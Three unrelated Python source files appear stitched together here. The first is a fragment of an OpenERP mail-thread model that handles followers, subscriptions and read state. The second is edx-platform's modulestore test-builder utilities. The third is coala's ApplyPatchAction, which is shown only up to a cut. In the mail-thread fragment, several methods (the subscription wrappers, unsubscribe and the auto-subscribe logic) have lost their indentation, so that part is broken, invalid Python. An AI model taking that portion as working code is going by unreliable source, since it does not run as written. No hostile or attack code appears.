            subtype_id = ref and ref[1] or False

        # automatically subscribe recipients if asked to
        if context.get('mail_post_autofollow') and thread_id and partner_ids:
            partner_to_subscribe = partner_ids
            if context.get('mail_post_autofollow_partner_ids'):
                partner_to_subscribe = filter(lambda item: item in context.get('mail_post_autofollow_partner_ids'), partner_ids)
            self.message_subscribe(cr, uid, [thread_id], list(partner_to_subscribe), context=context)

        # _mail_flat_thread: automatically set free messages to the first posted message
        if self._mail_flat_thread and not parent_id and thread_id:
            message_ids = mail_message.search(cr, uid, ['&', ('res_id', '=', thread_id), ('model', '=', model)], context=context, order="id ASC", limit=1)
            parent_id = message_ids and message_ids[0] or False
        # we want to set a parent: force to set the parent_id to the oldest ancestor, to avoid having more than 1 level of thread
        elif parent_id:
            message_ids = mail_message.search(cr, SUPERUSER_ID, [('id', '=', parent_id), ('parent_id', '!=', False)], context=context)
            # avoid loops when finding ancestors
            processed_list = []
            if message_ids:
                message = mail_message.browse(cr, SUPERUSER_ID, message_ids[0], context=context)
                while (message.parent_id and message.parent_id.id not in processed_list):
                    processed_list.append(message.parent_id.id)
                    message = message.parent_id
                parent_id = message.id

        values = kwargs
        values.update({
            'author_id': author_id,
            'model': model,
            'res_id': thread_id or False,
            'body': body,
            'subject': subject or False,
            'type': type,
            'parent_id': parent_id,
            'attachment_ids': attachment_ids,
            'subtype_id': subtype_id,
            'partner_ids': [(4, pid) for pid in partner_ids],
        })

        # Avoid warnings about non-existing fields
        for x in ('from', 'to', 'cc'):
            values.pop(x, None)

        # Create and auto subscribe the author
        msg_id = mail_message.create(cr, uid, values, context=context)
        message = mail_message.browse(cr, uid, msg_id, context=context)
        if message.author_id and thread_id and type != 'notification' and not context.get('mail_create_nosubscribe'):
            self.message_subscribe(cr, uid, [thread_id], [message.author_id.id], context=context)
        return msg_id
#------------------------------------------------------
# Followers API
#------------------------------------------------------
def message_get_subscription_data(self, cr, uid, ids, user_pid=None, context=None):
""" Wrapper to get subtypes data. """
return self._get_subscription_data(cr, uid, ids, None, None, user_pid=user_pid, context=context)
def message_subscribe_users(self, cr, uid, ids, user_ids=None, subtype_ids=None, context=None):
""" Wrapper on message_subscribe, using users. If user_ids is not
provided, subscribe uid instead. """
if user_ids is None:
user_ids = [uid]
partner_ids = [user.partner_id.id for user in self.pool.get('res.users').browse(cr, uid, user_ids, context=context)]
return self.message_subscribe(cr, uid, ids, partner_ids, subtype_ids=subtype_ids, context=context)
    def message_subscribe(self, cr, uid, ids, partner_ids, subtype_ids=None, context=None):
        """ Add partners to the records followers.

            Access policy: following only oneself requires read access (best
            effort: access errors make the call return False instead of
            raising); adding anyone else requires write access.

            :param list partner_ids: ids of the partners to subscribe
            :param list subtype_ids: subtype ids to set on the followers; if
                None, already-subscribed partners are left untouched and new
                followers get the model's default subtypes
            :return: True, or False when a self-subscription lacks read access
        """
        if context is None:
            context = {}
        mail_followers_obj = self.pool.get('mail.followers')
        subtype_obj = self.pool.get('mail.message.subtype')

        user_pid = self.pool.get('res.users').browse(cr, uid, uid, context=context).partner_id.id
        if set(partner_ids) == set([user_pid]):
            # subscribing only oneself: read access is enough; swallow access
            # errors (best effort), except right after a create
            if context.get('operation', '') != 'create':
                try:
                    self.check_access_rights(cr, uid, 'read')
                    self.check_access_rule(cr, uid, ids, 'read')
                except (osv.except_osv, orm.except_orm):
                    return False
        else:
            self.check_access_rights(cr, uid, 'write')
            self.check_access_rule(cr, uid, ids, 'write')

        # map each record to the partners already following it
        existing_pids_dict = {}
        fol_ids = mail_followers_obj.search(cr, SUPERUSER_ID, ['&', '&', ('res_model', '=', self._name), ('res_id', 'in', ids), ('partner_id', 'in', partner_ids)])
        for fol in mail_followers_obj.browse(cr, SUPERUSER_ID, fol_ids, context=context):
            existing_pids_dict.setdefault(fol.res_id, set()).add(fol.partner_id.id)

        # subtype_ids specified: update already subscribed partners
        if subtype_ids and fol_ids:
            mail_followers_obj.write(cr, SUPERUSER_ID, fol_ids, {'subtype_ids': [(6, 0, subtype_ids)]}, context=context)
        # subtype_ids not specified: do not update already subscribed partner, fetch default subtypes for new partners
        if subtype_ids is None:
            subtype_ids = subtype_obj.search(
                cr, uid, [
                    ('default', '=', True), '|', ('res_model', '=', self._name), ('res_model', '=', False)], context=context)

        for id in ids:
            existing_pids = existing_pids_dict.get(id, set())
            new_pids = set(partner_ids) - existing_pids

            # subscribe new followers
            for new_pid in new_pids:
                mail_followers_obj.create(
                    cr, SUPERUSER_ID, {
                        'res_model': self._name,
                        'res_id': id,
                        'partner_id': new_pid,
                        'subtype_ids': [(6, 0, subtype_ids)],
                    }, context=context)

        return True
def message_unsubscribe_users(self, cr, uid, ids, user_ids=None, context=None):
""" Wrapper on message_subscribe, using users. If user_ids is not
provided, unsubscribe uid instead. """
if user_ids is None:
user_ids = [uid]
partner_ids = [user.partner_id.id for user in self.pool.get('res.users').browse(cr, uid, user_ids, context=context)]
return self.message_unsubscribe(cr, uid, ids, partner_ids, context=context)
def message_unsubscribe(self, cr, uid, ids, partner_ids, context=None):
""" Remove partners from the records followers. """
user_pid = self.pool.get('res.users').read(cr, uid, uid, ['partner_id'], context=context)['partner_id'][0]
if set(partner_ids) == set([user_pid]):
self.check_access_rights(cr, uid, 'read')
self.check_access_rule(cr, uid, ids, 'read')
else:
self.check_access_rights(cr, uid, 'write')
self.check_access_rule(cr, uid, ids, 'write')
fol_obj = self.pool['mail.followers']
fol_ids = fol_obj.search(
cr, SUPERUSER_ID, [
('res_model', '=', self._name),
('res_id', 'in', ids),
('partner_id', 'in', partner_ids)
], context=context)
return fol_obj.unlink(cr, SUPERUSER_ID, fol_ids, context=context)
def _message_get_auto_subscribe_fields(self, cr, uid, updated_fields, auto_follow_fields=['user_id'], context=None):
""" Returns the list of relational fields linking to res.users that should
trigger an auto subscribe. The default list checks for the fields
- called 'user_id'
- linking to res.users
- with track_visibility set
In OpenERP V7, this is sufficent for all major addon such as opportunity,
project, issue, recruitment, sale.
Override this method if a custom behavior is needed about fields
that automatically subscribe users.
"""
user_field_lst = []
for name, column_info in self._all_columns.items():
if name in auto_follow_fields and name in updated_fields and getattr(column_info.column, 'track_visibility', False) and column_info.column._obj == 'res.users':
user_field_lst.append(name)
return user_field_lst
def message_auto_subscribe(self, cr, uid, ids, updated_fields, context=None, values=None):
""" Handle auto subscription. Two methods for auto subscription exist:
- tracked res.users relational fields, such as user_id fields. Those fields
must be relation fields toward a res.users record, and must have the
track_visilibity attribute set.
- using subtypes parent relationship: check if the current model being
modified has an header record (such as a project for tasks) whose followers
can be added as followers of the current records. Example of structure
with project and task:
- st_project_1.parent_id = st_task_1
- st_project_1.res_model = 'project.project'
- st_project_1.relation_field = 'project_id'
- st_task_1.model = 'project.task'
:param list updated_fields: list of updated fields to track
:param dict values: updated values; if None, the first record will be browsed
to get the values. Added after releasing 7.0, therefore
not merged with updated_fields argumment.
"""
subtype_obj = self.pool.get('mail.message.subtype')
follower_obj = self.pool.get('mail.followers')
new_followers = dict()
# fetch auto_follow_fields: res.users relation fields whose changes are tracked for subscription
user_field_lst = self._message_get_auto_subscribe_fields(cr, uid, updated_fields, context=context)
# fetch header subtypes
header_subtype_ids = subtype_obj.search(cr, uid, ['|', ('res_model', '=', False), ('parent_id.res_model', '=', self._name)], context=context)
subtypes = subtype_obj.browse(cr, uid, header_subtype_ids, context=context)
# if no change in tracked field or no change in tracked relational field: quit
relation_fields = set([subtype.relation_field for subtype in subtypes if subtype.relation_field is not False])
if not any(relation in updated_fields for relation in relation_fields) and not user_field_lst:
return True
# legacy behavior: if values is not given, compute the values by browsing
# @TDENOTE: remove me in 8.0
if values is None:
record = self.browse(cr, uid, ids[0], context=context)
for updated_field in updated_fields:
field_value = getattr(record, updated_field)
if isinstance(field_value, browse_record):
field_value = field_value.id
elif isinstance(field_value, browse_null):
field_value = False
values[updated_field] = field_value
# find followers of headers, update structure for new followers
headers = set()
for subtype in subtypes:
if subtype.relation_field and values.get(subtype.relation_field):
headers.add((subtype.res_model, values.get(subtype.relation_field)))
if headers:
header_domain = ['|'] * (len(headers) - 1)
for header in headers:
header_domain += ['&', ('res_model', '=', header[0]), ('res_id', '=', header[1])]
header_follower_ids = follower_obj.search(
cr, SUPERUSER_ID,
header_domain,
context=context
)
for header_follower in follower_obj.browse(cr, SUPERUSER_ID, header_follower_ids, context=context):
for subtype in header_follower.subtype_ids:
if subtype.parent_id and subtype.parent_id.res_model == self._name:
new_followers.setdefault(header_follower.partner_id.id, set()).add(subtype.parent_id.id)
elif subtype.res_model is False:
new_followers.setdefault(header_follower.partner_id.id, set()).add(subtype.id)
# add followers coming from res.users relational fields that are tracked
user_ids = [values[name] for name in user_field_lst if values.get(name)]
user_pids = [user.partner_id.id for user in self.pool.get('res.users').browse(cr, SUPERUSER_ID, user_ids, context=context)]
for partner_id in user_pids:
new_followers.setdefault(partner_id, None)
for pid, subtypes in new_followers.items():
subtypes = list(subtypes) if subtypes is not None else None
self.message_subscribe(cr, uid, ids, [pid], subtypes, context=context)
# find first email message, set it as unread for auto_subscribe fields for them to have a notification
if user_pids:
for record_id in ids:
message_obj = self.pool.get('mail.message')
msg_ids = message_obj.search(cr, SUPERUSER_ID, [
('model', '=', self._name),
('res_id', '=', record_id),
('type', '=', 'email')], limit=1, context=context)
if not msg_ids:
msg_ids = message_obj.search(cr, SUPERUSER_ID, [
('model', '=', self._name),
('res_id', '=', record_id)], limit=1, context=context)
if msg_ids:
self.pool.get('mail.notification')._notify(cr, uid, msg_ids[0], partners_to_notify=user_pids, context=context)
return True
#------------------------------------------------------
# Thread state
#------------------------------------------------------
    def message_mark_as_unread(self, cr, uid, ids, context=None):
        """ Mark the given records as unread for the current user.

        Flips ``read`` to false on the ``mail_notification`` rows linking the
        current user's partner to messages of the given records.

        :param ids: ids of records (model ``self._name``) to mark as unread
        :return: True
        """
        # Notifications are keyed on the user's partner, not the user itself.
        partner_id = self.pool.get('res.users').browse(cr, uid, uid, context=context).partner_id.id
        # NOTE(review): the subselect has ``limit 1`` over *all* given ids, so
        # at most one message total is marked unread; message_mark_as_read has
        # no such limit -- confirm this asymmetry is intentional.
        cr.execute('''
            UPDATE mail_notification SET
                read=false
            WHERE
                message_id IN (SELECT id from mail_message where res_id=any(%s) and model=%s limit 1) and
                partner_id = %s
        ''', (ids, self._name, partner_id))
        return True
    def message_mark_as_read(self, cr, uid, ids, context=None):
        """ Mark the given records as read for the current user.

        Flips ``read`` to true on every ``mail_notification`` row linking the
        current user's partner to any message of the given records.

        :param ids: ids of records (model ``self._name``) to mark as read
        :return: True
        """
        # Notifications are keyed on the user's partner, not the user itself.
        partner_id = self.pool.get('res.users').browse(cr, uid, uid, context=context).partner_id.id
        cr.execute('''
            UPDATE mail_notification SET
                read=true
            WHERE
                message_id IN (SELECT id FROM mail_message WHERE res_id=ANY(%s) AND model=%s) AND
                partner_id = %s
        ''', (ids, self._name, partner_id))
        return True
#------------------------------------------------------
# Thread suggestion
#------------------------------------------------------
    def get_suggested_thread(self, cr, uid, removed_suggested_threads=None, context=None):
        """Return a list of suggested threads, sorted by the numbers of followers

        :param removed_suggested_threads: ids the user has already dismissed;
            these are excluded from the suggestions
        :return: at most 3 dicts (id, popularity, name, image_small), ordered
            by follower count then id, descending
        """
        if context is None:
            context = {}

        # TDE HACK: originally by MAT from portal/mail_mail.py but not working until the inheritance graph bug is not solved in trunk
        # TDE FIXME: relocate in portal when it won't be necessary to reload the hr.employee model in an additional bridge module
        # Portal users get no suggestions at all.
        if self.pool['res.groups']._all_columns.get('is_portal'):
            user = self.pool.get('res.users').browse(cr, SUPERUSER_ID, uid, context=context)
            if any(group.is_portal for group in user.groups_id):
                return []

        threads = []
        if removed_suggested_threads is None:
            removed_suggested_threads = []
        # Only suggest threads the current user does not already follow.
        thread_ids = self.search(cr, uid, [('id', 'not in', removed_suggested_threads), ('message_is_follower', '=', False)], context=context)
        for thread in self.browse(cr, uid, thread_ids, context=context):
            data = {
                'id': thread.id,
                'popularity': len(thread.message_follower_ids),
                'name': thread.name,
                'image_small': thread.image_small
            }
            threads.append(data)
        return sorted(threads, key=lambda x: (x['popularity'], x['id']), reverse=True)[:3]
|
cpennington/edx-platform
|
common/lib/xmodule/xmodule/modulestore/tests/utils.py
|
"""
Helper classes and methods for running modulestore tests without Django.
"""
import io
import os
from contextlib import contextmanager
from contextlib2 import ExitStack
from importlib import import_module
from shutil import rmtree
from tempfile import mkdtemp
from unittest import TestCase
from uuid import uuid4
import six
from path import Path as path
from six.moves import range, zip
from xmodule.contentstore.mongo import MongoContentStore
from xmodule.modulestore.draft_and_published import ModuleStoreDraftAndPublished
from xmodule.modulestore.edit_info import EditInfoMixin
from xmodule.modulestore.inheritance import InheritanceMixin
from xmodule.modulestore.mixed import MixedModuleStore
from xmodule.modulestore.mongo.base import ModuleStoreEnum
from xmodule.modulestore.mongo.draft import DraftModuleStore
from xmodule.modulestore.split_mongo.split_draft import DraftVersioningModuleStore
from xmodule.modulestore.tests.factories import ItemFactory
from xmodule.modulestore.tests.mongo_connection import MONGO_HOST, MONGO_PORT_NUM
from xmodule.modulestore.xml import XMLModuleStore
from xmodule.modulestore.xml_importer import LocationMixin
from xmodule.tests import DATA_DIR
from xmodule.x_module import XModuleMixin
def load_function(path):
    """
    Import and return an object given its dotted path.

    ``path`` has the form ``"package.module.function"``: everything before the
    last dot is imported as a module, and the final component is looked up on
    it and returned.
    """
    dotted_module, _sep, attr_name = path.rpartition('.')
    module = import_module(dotted_module)
    return getattr(module, attr_name)
# pylint: disable=unused-argument
def create_modulestore_instance(
        engine,
        contentstore,
        doc_store_config,
        options,
        i18n_service=None,
        fs_service=None,
        user_service=None,
        signal_handler=None,
):
    """
    This will return a new instance of a modulestore given an engine and options

    :param engine: dotted path of the modulestore class to instantiate
    :param options: keyword options forwarded to the store constructor.
        NOTE(review): mutated in place when the store supports draft/publish
        (a 'branch_setting_func' key is added) -- confirm callers do not
        reuse the same dict across calls.
    :param i18n_service/fs_service/user_service: accepted for interface
        compatibility; unused here (see the pylint disable above).
    """
    class_ = load_function(engine)
    if issubclass(class_, ModuleStoreDraftAndPublished):
        # Draft-preferred branch so tests see unpublished content by default.
        options['branch_setting_func'] = lambda: ModuleStoreEnum.Branch.draft_preferred
    return class_(
        doc_store_config=doc_store_config,
        contentstore=contentstore,
        signal_handler=signal_handler,
        **options
    )
def mock_tab_from_json(tab_dict):
    """
    Test stand-in for ``CourseTab.from_json``.

    Returns the given dict unchanged, so tab deserialization is bypassed and
    tab plugin errors cannot occur during tests.
    """
    return tab_dict
def add_temp_files_from_dict(file_dict, dir):
    """
    Create files inside *dir* from a ``{file_name: content}`` mapping.

    Each entry becomes a file named ``file_name`` in ``dir``. Truthy content
    is written as text (coerced via ``six.text_type``); falsy content (e.g.
    ``None``) still creates the file, just empty.

    :param file_dict: mapping of file name to file content (or None)
    :param dir: target directory path (parameter name kept for backward
        compatibility although it shadows the ``dir`` builtin)
    """
    # Iterate items() directly instead of indexing the dict per key.
    for file_name, content in file_dict.items():
        with io.open("{}/{}".format(dir, file_name), "w") as opened_file:
            if content:
                opened_file.write(six.text_type(content))
def remove_temp_files_from_list(file_list, dir):
    """
    Delete the named files from *dir*, silently skipping names that do not
    exist there.

    :param file_list: iterable of bare file names (not full paths)
    :param dir: directory containing the files
    """
    for name in file_list:
        candidate = "{}/{}".format(dir, name)
        if not os.path.exists(candidate):
            continue
        os.remove(candidate)
class MixedSplitTestCase(TestCase):
    """
    Stripped-down version of ModuleStoreTestCase that can be used without Django
    (i.e. for testing in common/lib/ ). Sets up MixedModuleStore and Split.
    """
    # Minimal render function so tests need no real template engine.
    RENDER_TEMPLATE = lambda t_n, d, ctx=None, nsp='main': u'{}: {}, {}'.format(t_n, repr(d), repr(ctx))

    # Options forwarded to the backing (split) modulestore.
    # NOTE(review): DATA_DIR here is the value imported from xmodule.tests,
    # captured at class-creation time, *before* the module-level DATA_DIR
    # reassignment further down this file.
    modulestore_options = {
        'default_class': 'xmodule.raw_module.RawDescriptor',
        'fs_root': DATA_DIR,
        'render_template': RENDER_TEMPLATE,
        'xblock_mixins': (EditInfoMixin, InheritanceMixin, LocationMixin, XModuleMixin),
    }
    # Per-process database name so parallel test runs do not collide.
    DOC_STORE_CONFIG = {
        'host': MONGO_HOST,
        'port': MONGO_PORT_NUM,
        'db': 'test_mongo_libs_{0}'.format(os.getpid()),
        'collection': 'modulestore',
        'asset_collection': 'assetstore',
    }
    # Mixed store configured with a single 'split' backing store.
    MIXED_OPTIONS = {
        'stores': [
            {
                'NAME': 'split',
                'ENGINE': 'xmodule.modulestore.split_mongo.split_draft.DraftVersioningModuleStore',
                'DOC_STORE_CONFIG': DOC_STORE_CONFIG,
                'OPTIONS': modulestore_options
            },
        ]
    }

    def setUp(self):
        """
        Set up requirements for testing: a user ID and a modulestore
        """
        super(MixedSplitTestCase, self).setUp()
        self.user_id = ModuleStoreEnum.UserID.test

        self.store = MixedModuleStore(
            None,  # no contentstore
            create_modulestore_instance=create_modulestore_instance,
            mappings={},
            **self.MIXED_OPTIONS
        )
        # Tear down connections and drop the per-test database afterwards.
        self.addCleanup(self.store.close_all_connections)
        self.addCleanup(self.store._drop_database)  # pylint: disable=protected-access

    def make_block(self, category, parent_block, **kwargs):
        """
        Create a block of type `category` as a child of `parent_block`, in any
        course or library. You can pass any field values as kwargs.
        """
        # Skip publishing by default; explicit kwargs may override both keys.
        extra = {"publish_item": False, "user_id": self.user_id}
        extra.update(kwargs)
        return ItemFactory.create(
            category=category,
            parent=parent_block,
            parent_location=parent_block.location,
            modulestore=self.store,
            **extra
        )
class ProceduralCourseTestMixin(object):
    """
    Contains methods for testing courses generated procedurally
    """
    def populate_course(self, branching=2, emit_signals=False):
        """
        Add k chapters, k^2 sections, k^3 verticals, k^4 problems to self.course (where k = branching)

        :param branching: fan-out at every level of the course tree
        :param emit_signals: forwarded to the bulk-operation context
        """
        # NOTE(review): relies on self.user, self.course and self.store being
        # supplied by the class this is mixed into -- none are defined here.
        user_id = self.user.id
        self.populated_usage_keys = {}  # pylint: disable=attribute-defined-outside-init

        def descend(parent, stack):  # pylint: disable=missing-docstring
            # Depth-first build; 'stack' holds the remaining category levels.
            if not stack:
                return

            xblock_type = stack[0]
            for _ in range(branching):
                child = ItemFactory.create(
                    category=xblock_type,
                    parent_location=parent.location,
                    user_id=user_id
                )
                # Record every created usage key, grouped by category.
                self.populated_usage_keys.setdefault(xblock_type, []).append(
                    child.location
                )
                descend(child, stack[1:])

        # One bulk operation for the whole tree keeps this fast.
        with self.store.bulk_operations(self.course.id, emit_signals=emit_signals):
            descend(self.course, ['chapter', 'sequential', 'vertical', 'problem'])
class MemoryCache(object):
    """
    This fits the metadata_inheritance_cache_subsystem interface used by
    the modulestore, and stores the data in a dictionary in memory.
    """
    def __init__(self):
        # Backing store for every cached entry.
        self.data = {}

    def get(self, key, default=None):
        """
        Return the cached value for *key*, or *default* when unset.

        Args:
            key: The key to look up.
            default: The value returned if the key was never set.
        """
        try:
            return self.data[key]
        except KeyError:
            return default

    def set(self, key, value):
        """
        Store *value* under *key*, overwriting any previous entry.

        Args:
            key: The key to update.
            value: The value change the key to.
        """
        self.data[key] = value
class MongoContentstoreBuilder(object):
    """
    A builder class for a MongoContentStore.
    """
    @contextmanager
    def build(self):
        """
        A contextmanager that returns a MongoContentStore, and deletes its contents
        when the context closes.
        """
        # THIS_UUID / COMMON_DOCSTORE_CONFIG are module-level globals defined
        # further down this file; they isolate each test run's database.
        contentstore = MongoContentStore(
            db='contentstore{}'.format(THIS_UUID),
            collection='content',
            **COMMON_DOCSTORE_CONFIG
        )
        contentstore.ensure_indexes()

        try:
            yield contentstore
        finally:
            # Delete the created database
            contentstore._drop_database()  # pylint: disable=protected-access

    def __repr__(self):
        return 'MongoContentstoreBuilder()'
class StoreBuilderBase(object):
    """
    Base class for all modulestore builders.
    """
    @contextmanager
    def build(self, **kwargs):
        """
        Build the modulestore, optionally building the contentstore as well.

        Note the asymmetric yields: yields ``(contentstore, modulestore)``
        when no contentstore is passed in, but only ``modulestore`` when one
        is supplied via the 'contentstore' kwarg.
        """
        contentstore = kwargs.pop('contentstore', None)
        if not contentstore:
            with self.build_without_contentstore(**kwargs) as (contentstore, modulestore):
                yield contentstore, modulestore
        else:
            with self.build_with_contentstore(contentstore, **kwargs) as modulestore:
                yield modulestore

    @contextmanager
    def build_without_contentstore(self, **kwargs):
        """
        Build both the contentstore and the modulestore.
        """
        # Creates a throwaway contentstore first, then delegates to the
        # subclass's build_with_contentstore.
        with MongoContentstoreBuilder().build() as contentstore:
            with self.build_with_contentstore(contentstore, **kwargs) as modulestore:
                yield contentstore, modulestore
class MongoModulestoreBuilder(StoreBuilderBase):
    """
    A builder class for a DraftModuleStore.
    """
    @contextmanager
    def build_with_contentstore(self, contentstore, **kwargs):
        """
        A contextmanager that returns an isolated mongo modulestore, and then deletes
        all of its data at the end of the context.

        Args:
            contentstore: The contentstore that this modulestore should use to store
                all of its assets.

        NOTE(review): **kwargs is accepted but not forwarded to the store
        here (unlike VersioningModulestoreBuilder) -- confirm intended.
        """
        doc_store_config = dict(
            db='modulestore{}'.format(THIS_UUID),
            collection='xmodule',
            asset_collection='asset_metadata',
            **COMMON_DOCSTORE_CONFIG
        )

        # Set up a temp directory for storing filesystem content created during import
        fs_root = mkdtemp()

        modulestore = DraftModuleStore(
            contentstore,
            doc_store_config,
            fs_root,
            render_template=repr,
            # Draft-preferred branch mirrors Studio-style access.
            branch_setting_func=lambda: ModuleStoreEnum.Branch.draft_preferred,
            metadata_inheritance_cache_subsystem=MemoryCache(),
            xblock_mixins=XBLOCK_MIXINS,
        )
        modulestore.ensure_indexes()

        try:
            yield modulestore
        finally:
            # Delete the created database
            modulestore._drop_database()  # pylint: disable=protected-access

            # Delete the created directory on the filesystem
            rmtree(fs_root, ignore_errors=True)

    def __repr__(self):
        return 'MongoModulestoreBuilder()'
class VersioningModulestoreBuilder(StoreBuilderBase):
    """
    A builder class for a VersioningModuleStore.
    """
    @contextmanager
    def build_with_contentstore(self, contentstore, **kwargs):
        """
        A contextmanager that returns an isolated versioning modulestore, and then deletes
        all of its data at the end of the context.

        Args:
            contentstore: The contentstore that this modulestore should use to store
                all of its assets.
        """
        doc_store_config = dict(
            db='modulestore{}'.format(THIS_UUID),
            collection='split_module',
            **COMMON_DOCSTORE_CONFIG
        )
        # Set up a temp directory for storing filesystem content created during import
        fs_root = mkdtemp()

        modulestore = DraftVersioningModuleStore(
            contentstore,
            doc_store_config,
            fs_root,
            render_template=repr,
            xblock_mixins=XBLOCK_MIXINS,
            **kwargs
        )
        modulestore.ensure_indexes()

        try:
            yield modulestore
        finally:
            # Delete the created database
            modulestore._drop_database()  # pylint: disable=protected-access

            # Delete the created directory on the filesystem
            rmtree(fs_root, ignore_errors=True)

    def __repr__(self):
        # NOTE(review): repr says 'SplitModulestoreBuilder' while the class is
        # named VersioningModulestoreBuilder -- likely stale; confirm nothing
        # matches on this string (e.g. test ids) before renaming it.
        return 'SplitModulestoreBuilder()'
class XmlModulestoreBuilder(StoreBuilderBase):
    """
    A builder class for a XMLModuleStore.
    """
    # pylint: disable=unused-argument
    @contextmanager
    def build_with_contentstore(self, contentstore=None, course_ids=None, **kwargs):
        """
        A contextmanager that returns an isolated xml modulestore

        Args:
            contentstore: unused here (see the pylint disable); accepted only
                so this builder matches the common builder interface.
            course_ids: optional list restricting which courses are loaded.
        """
        # Uses the module-level DATA_DIR (the xml-course-root path defined
        # below), since this runs at call time, after the rebinding.
        modulestore = XMLModuleStore(
            DATA_DIR,
            course_ids=course_ids,
            default_class='xmodule.hidden_module.HiddenDescriptor',
            xblock_mixins=XBLOCK_MIXINS,
        )
        # No cleanup required: the XML store writes nothing to db or disk.
        yield modulestore
class MixedModulestoreBuilder(StoreBuilderBase):
    """
    A builder class for a MixedModuleStore.
    """
    def __init__(self, store_builders, mappings=None):
        """
        Args:
            store_builders: A list of modulestore builder objects. These will be instantiated, in order,
                as the backing stores for the MixedModuleStore.
            mappings: Any course mappings to pass to the MixedModuleStore on instantiation.
        """
        self.store_builders = store_builders
        self.mappings = mappings or {}
        # Set by build_with_contentstore(); None until the store is built.
        self.mixed_modulestore = None

    @contextmanager
    def build_with_contentstore(self, contentstore, **kwargs):
        """
        A contextmanager that returns a mixed modulestore built on top of modulestores
        generated by other builder classes.

        Args:
            contentstore: The contentstore that this modulestore should use to store
                all of its assets.
        """
        names, generators = list(zip(*self.store_builders))

        # ExitStack keeps every sub-builder's context open for the duration
        # of this context and unwinds them all (in reverse order) on exit.
        with ExitStack() as stack:
            modulestores = [stack.enter_context(gen.build_with_contentstore(contentstore, **kwargs)) for gen in generators]
            # Make the modulestore creation function just return the already-created modulestores
            store_iterator = iter(modulestores)
            next_modulestore = lambda *args, **kwargs: next(store_iterator)

            # Generate a fake list of stores to give the already generated stores appropriate names
            stores = [{'NAME': name, 'ENGINE': 'This space deliberately left blank'} for name in names]

            self.mixed_modulestore = MixedModuleStore(
                contentstore,
                self.mappings,
                stores,
                create_modulestore_instance=next_modulestore,
                xblock_mixins=XBLOCK_MIXINS,
            )
            yield self.mixed_modulestore

    def __repr__(self):
        return 'MixedModulestoreBuilder({!r}, {!r})'.format(self.store_builders, self.mappings)

    def asset_collection(self):
        """
        Returns the collection storing the asset metadata.

        Returns None when more than one backing store exists (ambiguous).
        """
        all_stores = self.mixed_modulestore.modulestores
        if len(all_stores) > 1:
            return None

        store = all_stores[0]
        if hasattr(store, 'asset_collection'):
            # Mongo modulestore beneath mixed.
            # Returns the entire collection with *all* courses' asset metadata.
            return store.asset_collection
        else:
            # Split modulestore beneath mixed.
            # Split stores all asset metadata in the structure collection.
            return store.db_connection.structures
# Unique per-process suffix used to isolate this run's Mongo databases.
THIS_UUID = uuid4().hex

COMMON_DOCSTORE_CONFIG = {
    'host': MONGO_HOST,
    'port': MONGO_PORT_NUM,
}
# NOTE(review): this rebinds the DATA_DIR imported from xmodule.tests at the
# top of the file. Class bodies above captured the imported value at class
# creation; code that reads DATA_DIR at call time (e.g. XmlModulestoreBuilder)
# sees this path instead -- confirm the shadowing is intended.
DATA_DIR = path(__file__).dirname().parent.parent / "tests" / "data" / "xml-course-root"
TEST_DATA_DIR = 'common/test/data/'

XBLOCK_MIXINS = (InheritanceMixin, XModuleMixin)

# Pre-built builder combinations used to parametrize modulestore tests.
MIXED_MODULESTORE_BOTH_SETUP = MixedModulestoreBuilder([
    ('draft', MongoModulestoreBuilder()),
    ('split', VersioningModulestoreBuilder())
])
DRAFT_MODULESTORE_SETUP = MixedModulestoreBuilder([('draft', MongoModulestoreBuilder())])
SPLIT_MODULESTORE_SETUP = MixedModulestoreBuilder([('split', VersioningModulestoreBuilder())])
MIXED_MODULESTORE_SETUPS = (
    DRAFT_MODULESTORE_SETUP,
    SPLIT_MODULESTORE_SETUP,
)
MIXED_MS_SETUPS_SHORT = (
    'mixed_mongo',
    'mixed_split',
)
DIRECT_MODULESTORE_SETUPS = (
    MongoModulestoreBuilder(),
    # VersioningModulestoreBuilder(),  # FUTUREDO: LMS-11227
)
DIRECT_MS_SETUPS_SHORT = (
    'mongo',
    #'split',
)
MODULESTORE_SETUPS = DIRECT_MODULESTORE_SETUPS + MIXED_MODULESTORE_SETUPS
MODULESTORE_SHORTNAMES = DIRECT_MS_SETUPS_SHORT + MIXED_MS_SETUPS_SHORT
# Maps each builder object to its short display name (used in test ids).
SHORT_NAME_MAP = dict(list(zip(MODULESTORE_SETUPS, MODULESTORE_SHORTNAMES)))

CONTENTSTORE_SETUPS = (MongoContentstoreBuilder(),)

# Fixture file sets for the dot-file / backup-file filtering tests.
DOT_FILES_DICT = {
    ".DS_Store": None,
    ".example.txt": "BLUE",
}
TILDA_FILES_DICT = {
    "example.txt~": "RED"
}
class PureModulestoreTestCase(TestCase):
    """
    A TestCase designed to make testing Modulestore implementations without using Django
    easier.
    """
    # Subclasses must set this to one of the *_MODULESTORE_SETUP builders.
    MODULESTORE = None

    def setUp(self):
        super(PureModulestoreTestCase, self).setUp()
        builder = self.MODULESTORE.build()
        # Enter the builder's context manually so teardown can be deferred to
        # addCleanup (no 'with' block can span the whole test method).
        self.assets, self.store = builder.__enter__()
        self.addCleanup(builder.__exit__, None, None, None)
|
sils1297/coala
|
coalib/results/result_actions/ApplyPatchAction.py
|
import shutil
from os.path import isfile
from os import remove
from coalib.results.result_actions.ShowPatchAction import ShowPatchAction
from coalib.results.result_actions.ResultAction import ResultAction
class ApplyPatchAction(ResultAction):

    SUCCESS_MESSAGE = "Patch applied successfully."

    # Applicable exactly when the patch could also be shown.
    is_applicable = staticmethod(ShowPatchAction.is_applicable)

    def apply(self,
              result,
              original_file_dict,
              file_diff_dict,
              no_orig: bool=False):
        """
        Apply patch

        Writes every diff carried by *result* to disk, accumulating diffs per
        file into *file_diff_dict* across repeated invocations.

        :param result: the result whose ``diffs`` (filename -> Diff) to apply
        :param original_file_dict: unused here -- NOTE(review): kept for the
            ResultAction.apply interface; confirm before removing.
        :param file_diff_dict: running filename -> accumulated Diff mapping;
            mutated in place and also returned
        :param no_orig: Whether or not to create .orig backup files
        """
        for filename in result.diffs:
            pre_patch_filename = filename
            if filename in file_diff_dict:
                diff = file_diff_dict[filename]
                # An earlier patch in this run may have renamed the file on
                # disk already; operate on the current on-disk name.
                pre_patch_filename = (diff.rename
                                      if diff.rename is not False
                                      else filename)
                # Merge this result's diff into the accumulated diff.
                file_diff_dict[filename] += result.diffs[filename]
            else:
                file_diff_dict[filename] = result.diffs[filename]
                # Backup original file, only if there was no previous patch
                # from this run though!
                if not no_orig and isfile(pre_patch_filename):
                    shutil.copy2(pre_patch_filename,
                                 pre_patch_filename + ".orig")

